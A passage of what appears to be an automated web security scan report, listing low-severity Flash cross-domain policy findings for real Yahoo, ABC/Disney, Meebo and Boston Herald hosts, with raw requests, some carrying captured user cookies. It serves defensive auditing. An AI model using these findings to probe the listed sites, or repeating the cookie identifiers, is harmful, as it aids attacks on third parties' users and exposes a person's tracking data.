Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: bostonheraldnie.newspaperdirect.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Sun, 18 Sep 2011 19:14:10 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/7.5
wc: 3
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:38:55 GMT
Connection: close
Content-Length: 262

<?xml version="1.0"?>
<cross-domain-policy>
   <!--allow-access-from domain="*" secure="false" /-->
   <allow-access-from domain="*.pressdisplay.com" secure="false" />
   <allow-access-from domain="*.newspaperdirect.com" secure="false" />
...[SNIP]...

5.130. http://cache.heraldinteractive.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cache.heraldinteractive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.heraldinteractive.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
Last-Modified: Thu, 25 Aug 2011 16:03:12 GMT
Accept-Ranges: bytes
Content-Length: 335
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:09:14 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bostonherald.com" />
<allow-access-from domain="*.heraldinteractive.com" />
<allow-access-from domain="*.brightcove.com" />
...[SNIP]...

5.131. http://cdn.abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.abc.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "80e1e7c83143cc1:ec04"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc01
X-Powered-By: ASP.NET
Cache-Expires: Thu, 15 Sep 2011 19:58:18 GMT
Age: 208
Date: Sat, 17 Sep 2011 01:03:46 GMT
Last-Modified: Fri, 15 Jul 2011 20:57:19 GMT
Expires: Sat, 17 Sep 2011 01:05:18 GMT
Content-Length: 982
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcfamily.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.innovid.com" secure="false" />
...[SNIP]...
<allow-access-from domain="afv.dev.dave.tv" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wdig.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="widgets.clearspring.com" secure="false" />
...[SNIP]...

5.132. http://cdn.media.abc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.media.abc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.media.abc.com

Response

HTTP/1.0 200 OK
Content-Length: 982
Content-Type: text/xml
Last-Modified: Fri, 15 Jul 2011 20:57:19 GMT
Accept-Ranges: bytes
ETag: "80e1e7c83143cc1:5763"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed06
X-Powered-By: ASP.NET
Cache-Expires: Fri, 15 Jul 2011 21:05:37 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=186
Date: Sat, 17 Sep 2011 01:02:42 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcfamily.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.innovid.com" secure="false" />
...[SNIP]...
<allow-access-from domain="afv.dev.dave.tv" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wdig.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="widgets.clearspring.com" secure="false" />
...[SNIP]...

5.133. http://cdn.media.abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.media.abc.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.media.abc.go.com

Response

HTTP/1.0 200 OK
Content-Length: 982
Content-Type: text/xml
Last-Modified: Fri, 15 Jul 2011 20:57:19 GMT
Accept-Ranges: bytes
ETag: "80e1e7c83143cc1:5763"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed06
X-Powered-By: ASP.NET
Cache-Expires: Fri, 15 Jul 2011 21:05:37 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=193
Date: Sat, 17 Sep 2011 01:02:16 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcfamily.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.innovid.com" secure="false" />
...[SNIP]...
<allow-access-from domain="afv.dev.dave.tv" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="soapnet.com" secure="false" />
...[SNIP]...
<allow-access-from domain="wdig.vo.llnwd.net" secure="false" />
...[SNIP]...
<allow-access-from domain="widgets.clearspring.com" secure="false" />
...[SNIP]...

5.134. http://cdn.video.abc.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.video.abc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: cdn.video.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=3600
Content-Length: 1296
Content-Type: application/xml
Last-Modified: Mon, 01 Aug 2011 23:52:49 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.8
x-permitted-cross-domain-policies: all
Expires: Sat, 17 Sep 2011 02:03:53 GMT
Date: Sat, 17 Sep 2011 01:03:53 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.abc.com" secure="false"/>
   <allow-access-from domain="*.abcfamily.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abc.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.abcfamily.go.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.theview.tv" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.soapnet.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="theview.pseudosisu.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="a.dolimg.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="afv.dev.dave.tv" secure="false"/>
...[SNIP]...
<allow-access-from domain="wdig.vo.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="widgets.clearspring.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.fwmrm.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.freewheel.tv" secure="false"/>
...[SNIP]...

5.135. http://cim.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 00:51:57 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

5.136. http://cookex.amp.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cookex.amp.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cookex.amp.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:54:37 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 14 May 2010 21:53:13 GMT
Accept-Ranges: bytes
Content-Length: 1548
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
...[SNIP]...
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

5.137. http://images.search.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://images.search.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: images.search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:56:01 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml
Cache-Control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.138. http://mi.adinterax.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mi.adinterax.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7776000
Content-Length: 708
Content-Type: application/xml
Expires: Wed, 07 Dec 2011 12:45:59 GMT
Last-Modified: Thu, 02 Sep 2010 20:10:03 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Date: Sat, 17 Sep 2011 00:52:20 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="adinterax.cnet.com.edgesuite.net" />
<allow-access-from domain="adinterax.myspace.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

5.139. http://omg.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://omg.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: omg.yahoo.com

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:52:07 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 28 Mar 2011 09:57:27 GMT
Accept-Ranges: bytes
Content-Length: 259
Content-Type: application/xml
Age: 0
Server: YTS/1.20.7

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yimg.com" />
...[SNIP]...

5.140. http://qa.n7.vp2.abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://qa.n7.vp2.abc.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: qa.n7.vp2.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:03:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 18 May 2011 03:08:05 GMT
ETag: "188304-24e-327e6f40"
Accept-Ranges: bytes
Content-Length: 590
X-Cnection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.go.com" secure="false" />
<allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcfamily.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcnews.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...

5.141. http://rd.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 17 Sep 2011 00:51:59 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Thu, 24 Mar 2011 18:45:06 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>

5.142. http://search.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.yahoo.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:54 GMT
Set-Cookie: D=; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 29 Oct 2009 00:28:40 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml
Cache-Control: private

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.143. http://site.abc.go.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://site.abc.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: site.abc.go.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Aindex%7C1316240932448%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 17 Sep 2011 01:03:08 GMT
Content-Type: text/xml
Last-Modified: Fri, 15 Jul 2011 20:57:19 GMT
Accept-Ranges: bytes
ETag: "80e1e7c83143cc1:199e2"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:04:51 GMT
Content-Length: 982
X-UA-Compatible: IE=EmulateIE7

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.abc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.abcfamily.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dig.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.disney.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.go.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.hulu.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.starwave.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.innovid.com" secure="false" />
...[SNIP]...
<allow-access-from domain="afv.dev.dave.tv" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn.media.soapnet.com" secure="false" />
...[SNIP]...
